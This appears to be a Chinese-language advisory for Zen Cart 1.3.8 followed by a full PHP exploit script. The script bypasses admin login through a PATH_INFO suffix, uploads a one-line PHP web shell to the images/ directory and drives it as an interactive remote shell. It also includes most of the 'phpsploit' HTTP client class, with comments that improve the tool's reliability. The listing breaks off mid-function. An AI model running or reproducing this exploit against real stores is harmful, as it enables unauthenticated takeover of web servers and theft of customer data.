影响版本:
Zen Cart 1.3.8
程序介绍:
Zen Cart是一款免费开源的购物车软件。
漏洞分析:
Zen Cart 的 admin/record_company.php 没有强制进行管理员身份认证：只要在该脚本路径后附加一段 PATH_INFO（下文利用代码使用的是 /password_forgotten.php），请求就能在未登录的情况下到达 action=insert 处理逻辑。攻击者随后可通过 record_company_image 表单字段上传任意内容的 .php 文件——从利用代码看，服务器端既不校验文件扩展名也不校验 MIME 类型（Content-Type 为任意值也能成功）——文件被保存到可直接通过 Web 访问的 images/ 目录，攻击者再直接请求 images/ 下的该文件即可以 Web 服务器权限执行任意命令（未认证远程代码执行）。按利用代码头部的说明，1.3.8a 版本已修复此问题；升级前至少应限制对 admin/ 目录的访问，并禁止 images/ 目录执行 PHP。
漏洞利用:
- #!/usr/bin/php
- <?php
- #
- # ——- Zen Cart 1.3.8 Remote Code Execution
- # http://www.zen-cart.com/
- # Zen Cart Ecommerce – putting the dream of server rooting within reach of anyone!
- # A new version (1.3.8a) is avaible on http://www.zen-cart.com/
- #
- # BlackH 🙂
- #
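# Notices are silenced on purpose: the formdata() request in remote_exec() is
# keyed with bare frmdt_* identifiers that rely on old PHP turning an undefined
# constant into its own name (a fatal error on PHP 8).
error_reporting(E_ALL ^ E_NOTICE);

# Usage banner when no target URL was given.
if ($argc < 2) {
    echo "
=___________ Zen Cart 1.3.8 Remote Code Execution Exploit ____________=
========================================================================
| BlackH <Bl4ck.H@gmail.com> |
========================================================================
| |
| \$system> php $argv[0] <url> |
| Notes: <url> ex: http://victim.com/site (no slash) |
| |
========================================================================
";
    exit(1);
}

# Base URL of the target. The usage text asks for no trailing slash; one is
# tolerated anyway so "$url/admin/" never becomes ".../site//admin/".
$url = rtrim($argv[1], '/');

# Appended as PATH_INFO to admin/record_company.php (see remote_exec()); per the
# advisory this is what lets the request past the admin login check — the
# check itself is not part of this listing.
$trick = "/password_forgotten.php";

# Shared HTTP client; remote_exec() reaches it through `global`.
$xpl = new phpsploit();
$xpl->agent("Mozilla Firefox");

remote_exec($url);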
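# Remote Code Execution Exploit
/**
 * Upload a one-line PHP shell through admin/record_company.php and drive it
 * interactively from STDIN.
 *
 * The upload is a multipart POST to record_company.php with $trick appended
 * as PATH_INFO and ?action=insert. No admin session cookie is ever sent, the
 * file name ends in .php and the part's Content-Type is an arbitrary string,
 * which the target accepts. Each command is then carried in a SHELL request
 * header to the dropped file under /images/ and the response body is printed.
 *
 * @param string $url  Base URL of the Zen Cart install, without trailing
 *                     slash. Also uses the globals $xpl (phpsploit client)
 *                     and $trick (PATH_INFO suffix).
 * @return void        Returns when the operator types "quit" or "exit", or
 *                     when STDIN is exhausted. Dies if /admin/ cannot be
 *                     fetched or the upload request fails.
 */
function remote_exec($url)
{
    global $xpl, $trick;

    echo "\n[-] Remote Code Execution";

    // Reachability check. NOTE(review): get() is not in this listing; if it
    // returns the raw response, a 401/403/404 body is still truthy and this
    // only trips on an empty reply — do not read it as an auth check.
    if (!$xpl->get($url . '/admin/')) {
        die("\n[!] error – the /admin/ directory is protected or don’t exist.\n");
    }

    // Name of the dropped shell. The original used rand(0, 1337), i.e. one
    // of only 1338 possible names that anyone reading this script could
    // enumerate on the target. uniqid()+mt_rand() is still no CSPRNG, but the
    // file is no longer trivially guessable; random_bytes() is avoided because
    // the rest of the file is written for PHP 4/5.
    $n = substr(md5(uniqid(mt_rand(), true)), 0, 8) . ".php";
    $code = '<?php system($_SERVER["HTTP_SHELL"]); ?>';

    // frmdt_* are bare identifiers, not defined constants: with notices
    // suppressed, PHP 5 turns them into the strings "frmdt_url" etc., which
    // is presumably what phpsploit::formdata() reads (its body is not in view).
    $form = array(
        frmdt_url => $url . "/admin/record_company.php" . $trick . "?action=insert",
        "record_company_name" => "0",
        "record_company_image" => array(
            frmdt_type => "tgreal/suce", # any Content-Type is accepted — it works ! o_O
            frmdt_filename => $n,
            frmdt_content => $code,
        ),
    );

    if ($xpl->formdata($form)) {
        echo "\n[!] Done – Start Shell: " . $n;
    } else {
        die("\n[!] error – can’t upload the shell\n");
    }

    print "\nrce@jah\$> ";
    // Stop on EOF as well as on quit/exit. The original looped on
    // trim(fgets(STDIN)) alone, so once STDIN was closed (fgets() === false,
    // trimmed to "") nothing ever matched quit|exit and it spun forever
    // sending empty commands to the target.
    while (($line = fgets(STDIN)) !== false) {
        $cmd = trim($line);
        if (preg_match("#^(quit|exit)$#", $cmd)) {
            break;
        }
        $xpl->addheader('SHELL', $cmd);
        $xpl->get($url . '/images/' . $n);
        print $xpl->getcontent() . "\nrce@jah$> ";
        # don’t forget to "rm *.php" and exit
        # you can use "Zen Cart 1.3.8 Remote SQL Execution Exploit"
        # to clean the database (record_company & record_company_info)
    }
}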
- class phpsploit
- {
// State of the phpsploit HTTP client (old-style `var`, i.e. public). The
// methods get()/post()/formdata()/getcookie()/getredirection()/getcontent()
// are outside this listing; only what sock() and the helpers below visibly
// use is stated as fact.
var $proxyhost;        // proxy host, set by proxy(); sock() connects here when proxyhost and proxyport are both non-empty
var $proxyport;        // proxy port (int), set by proxy()
var $host;             // origin host: connect target without a proxy, and the Host: header value
var $path;             // not referenced by the methods shown here
var $port;             // origin port used by sock() when no proxy is configured
var $method;           // 'get', 'post' or 'formdata'; anything else makes sock() die
var $url;              // request-target written into the request line by sock()
var $packet;           // the raw HTTP request assembled by sock(); returned by showlastrequest()
var $proxyuser;        // proxy credentials from proxyauth(); sock() sends Proxy-Authorization: Basic whenever proxyuser is non-empty (even with no proxy configured)
var $proxypass;
var $header;           // name => value map of request headers, filled by addheader()
var $cookie;           // name => value map of request cookies, filled by addcookie()
var $data;             // request body for post/formdata; Content-Length is strlen($data)
var $boundary;         // multipart boundary suffix; sock() prefixes it with 27 dashes
var $allowredirection; // if truthy, sock() returns getredirection() instead of the raw response
var $last_redirection; // not referenced by the methods shown here
var $cookiejar;        // if truthy, sock() calls getcookie() after each response
var $recv;             // raw response (status line, headers and body) read until the server closes
var $cookie_str;       // serialized Cookie header value, rebuilt on every showcookie() call
var $header_str;       // serialized header lines, rebuilt on every showheader() call
var $server_content;   // presumably the parsed body/headers behind getcontent() — not visible here
var $server_header;
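/**
 * Open the connection, send the request assembled from the object state and
 * read the whole response. Called by get()/post()/formdata(); there is no
 * reason to call it directly.
 *
 * Reads: proxyhost/proxyport (connect through the proxy when both are set),
 * host/port (direct connect), method ('get' | 'post' | 'formdata'), url,
 * proxyuser/proxypass, header, cookie, data, boundary, cookiejar,
 * allowredirection.
 * Writes: packet (the raw request, see showlastrequest()) and recv (the raw
 * response).
 *
 * @access private
 * @return string $this->recv, or whatever getredirection() returns when
 *                allowredirection is set. Dies on connect failure and on an
 *                unknown method (callers have nothing to catch).
 */
function sock()
{
    // A proxy is in use only when proxy() supplied both host and port.
    $viaProxy = !empty($this->proxyhost) && !empty($this->proxyport);

    $errno = 0;
    $errstr = '';
    if ($viaProxy) {
        $socket = @fsockopen($this->proxyhost, $this->proxyport, $errno, $errstr);
    } else {
        $socket = @fsockopen($this->host, $this->port, $errno, $errstr);
    }
    if (!$socket) {
        // Keep the original message, but say why when the runtime tells us.
        die("Error: Host seems down" . ($errstr !== '' ? " ($errstr)" : ''));
    }

    // Request line.
    switch ($this->method) {
        case 'get':
            $this->packet = 'GET ' . $this->url . " HTTP/1.1\r\n";
            break;
        case 'post':
        case 'formdata':
            $this->packet = 'POST ' . $this->url . " HTTP/1.1\r\n";
            break;
        default:
            die("Error: Invalid method");
    }

    // Proxy credentials go to the proxy only. The original emitted
    // Proxy-Authorization whenever proxyuser was set, so calling proxyauth()
    // without proxy() handed the proxy password to the origin server.
    if ($viaProxy && !empty($this->proxyuser)) {
        $this->packet .= 'Proxy-Authorization: Basic '
            . base64_encode($this->proxyuser . ':' . $this->proxypass) . "\r\n";
    }
    if (!empty($this->header)) {
        $this->packet .= $this->showheader();
    }
    if (!empty($this->cookie)) {
        $this->packet .= 'Cookie: ' . $this->showcookie() . "\r\n";
    }
    $this->packet .= 'Host: ' . $this->host . "\r\n";
    $this->packet .= "Connection: Close\r\n";

    // Body. Content-Length covers $this->data only; the extra CRLFs after it
    // are tolerated because the connection is closed after this request.
    if ($this->method == 'post') {
        $this->packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
        $this->packet .= 'Content-Length: ' . strlen($this->data) . "\r\n\r\n";
        $this->packet .= $this->data . "\r\n";
    } elseif ($this->method == 'formdata') {
        // The boundary on the wire is 27 dashes plus $this->boundary; the
        // body in $this->data must have been built with the same string.
        $this->packet .= 'Content-Type: multipart/form-data; boundary='
            . str_repeat('-', 27) . $this->boundary . "\r\n";
        $this->packet .= 'Content-Length: ' . strlen($this->data) . "\r\n\r\n";
        $this->packet .= $this->data;
    }
    $this->packet .= "\r\n";

    // Send, then drain until the server closes the connection.
    $this->recv = '';
    fputs($socket, $this->packet);
    while (!feof($socket)) {
        $this->recv .= fgets($socket);
    }
    fclose($socket);

    if ($this->cookiejar) {
        $this->getcookie();
    }
    if ($this->allowredirection) {
        return $this->getredirection();
    }
    return $this->recv;
}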
/**
 * Set (or overwrite) one cookie for the next request.
 * Cookies live in a name => value map, so repeating a name replaces the
 * earlier value instead of sending the cookie twice; showcookie() serializes
 * the map.
 *
 * @access public
 * @param string $cookn cookie name
 * @param string $cookv cookie value
 * @example $this->addcookie('name', 'value')
 */
function addcookie($cookn, $cookv)
{
    $jar = isset($this->cookie) ? $this->cookie : array();
    $jar[$cookn] = $cookv;
    $this->cookie = $jar;
}
/**
 * Set (or overwrite) one request header for the next request.
 * Headers live in a name => value map, so repeating a name replaces the
 * earlier value; showheader() serializes the map. No CRLF filtering is
 * applied to $headervalue.
 *
 * @access public
 * @param string $headern     header name
 * @param string $headervalue header value
 * @example $this->addheader('Client-IP', '128.5.2.3')
 */
function addheader($headern, $headervalue)
{
    $headers = isset($this->header) ? $this->header : array();
    $headers[$headern] = $headervalue;
    $this->header = $headers;
}
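/**
 * Select an HTTP proxy for subsequent requests, given as "host:port" or as
 * two arguments. Writes proxyhost/proxyport; sock() connects there when both
 * are non-empty.
 *
 * @access public
 * @param string  $proxy  proxy host, or "host:port" when $proxyp is empty
 * @param integer $proxyp proxy port (ignored when empty)
 * @example $this->proxy('localhost', 8118)
 * @example $this->proxy('localhost:8118')
 * @example $this->proxy('[::1]:8118')
 */
function proxy($proxy, $proxyp = '')
{
    if (empty($proxyp)) {
        // "host:port" form. Split on the last colon so a bracketed IPv6
        // literal keeps its inner colons. The original took explode(':')
        // element [1], which is wrong for IPv6 and undefined when no port
        // was given at all.
        $sep = strrpos($proxy, ':');
        if ($sep === false) {
            die("Error: Invalid port number");
        }
        $this->proxyhost = substr($proxy, 0, $sep);
        $this->proxyport = (int)substr($proxy, $sep + 1);
    } else {
        $this->proxyhost = $proxy;
        $this->proxyport = (int)$proxyp;
    }
    // The original only rejected ports above 65535; 0 (what a non-numeric
    // port string casts to) and negatives are invalid as well.
    if ($this->proxyport < 1 || $this->proxyport > 65535) {
        die("Error: Invalid port number");
    }
}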
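/**
 * Set the credentials for HTTP proxy basic authentication, given as
 * "user:pwd" or as two arguments. Writes proxyuser/proxypass; sock() sends
 * them as Proxy-Authorization: Basic.
 *
 * @access public
 * @param string $proxyauth proxy user, or "user:pwd" when $proxypass is empty
 * @param string $proxypass proxy password (ignored when empty)
 * @example $this->proxyauth('user', 'pwd')
 * @example $this->proxyauth('user:pwd')
 */
function proxyauth($proxyauth, $proxypass = '')
{
    if (empty($proxypass)) {
        // "user:pwd" form, split at the first colon so the password may
        // itself contain colons. Without any colon the original used
        // strpos() === false as offset 0, leaving the user empty and the
        // password as everything after the first character; now the whole
        // string is the user and the password stays empty.
        $sep = strpos($proxyauth, ':');
        if ($sep === false) {
            $this->proxyuser = $proxyauth;
            $this->proxypass = '';
        } else {
            $this->proxyuser = substr($proxyauth, 0, $sep);
            $this->proxypass = substr($proxyauth, $sep + 1);
        }
    } else {
        $this->proxyuser = $proxyauth;
        $this->proxypass = $proxypass;
    }
}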
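/**
 * Set the User-Agent header for subsequent requests. Thin wrapper around
 * addheader(); the string literal was restored from the mis-encoded quotes
 * in the listing so the call parses.
 *
 * @access public
 * @param string $useragent value of the User-Agent header
 * @example $this->agent('Firefox')
 */
function agent($useragent)
{
    $this->addheader('User-Agent', $useragent);
}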
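/**
 * Serialize the headers added with addheader() as "Name: value\r\n" lines,
 * in insertion order, and cache the result in header_str. Values are not
 * CRLF-filtered. Quote characters in the listing were restored so the
 * method parses.
 *
 * @access public
 * @return string|null the header lines, or null when no header was added
 *                     (header_str is still reset to "")
 * @example $this->showheader()
 */
function showheader()
{
    $this->header_str = '';
    if (!isset($this->header)) {
        return;
    }
    foreach ($this->header as $name => $value) {
        $this->header_str .= $name . ': ' . $value . "\r\n";
    }
    return $this->header_str;
}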
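/**
 * Serialize the cookies added with addcookie() as "name=value; " pairs, in
 * insertion order (note the trailing "; "), and cache the result in
 * cookie_str. Names and values are not encoded. Quote characters in the
 * listing were restored so the method parses.
 *
 * @access public
 * @return string|null the Cookie header value, or null when no cookie was
 *                     added (cookie_str is still reset to "")
 * @example $this->showcookie()
 */
function showcookie()
{
    $this->cookie_str = '';
    if (!isset($this->cookie)) {
        return;
    }
    foreach ($this->cookie as $name => $value) {
        $this->cookie_str .= $name . '=' . $value . '; ';
    }
    return $this->cookie_str;
}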
/**
 * Return the raw HTTP request most recently assembled by sock(), or null
 * when no request has been built yet.
 *
 * @access public
 * @return string|null $this->packet
 * @example $this->showlastrequest()
 */
function showlastrequest()
{
    return isset($this->packet) ? $this->packet : null;
}
- /**
- * This function sends the formed
- * http packet with the GET method.
- *
- * @access public
- * @param string url Url
- * @return string $this->sock()
- * @example $this->get(‘localhost/index.php?var=x’)
- * @example $this->get(‘http://localhost:88/tst.php’)
- *
- */
- function get(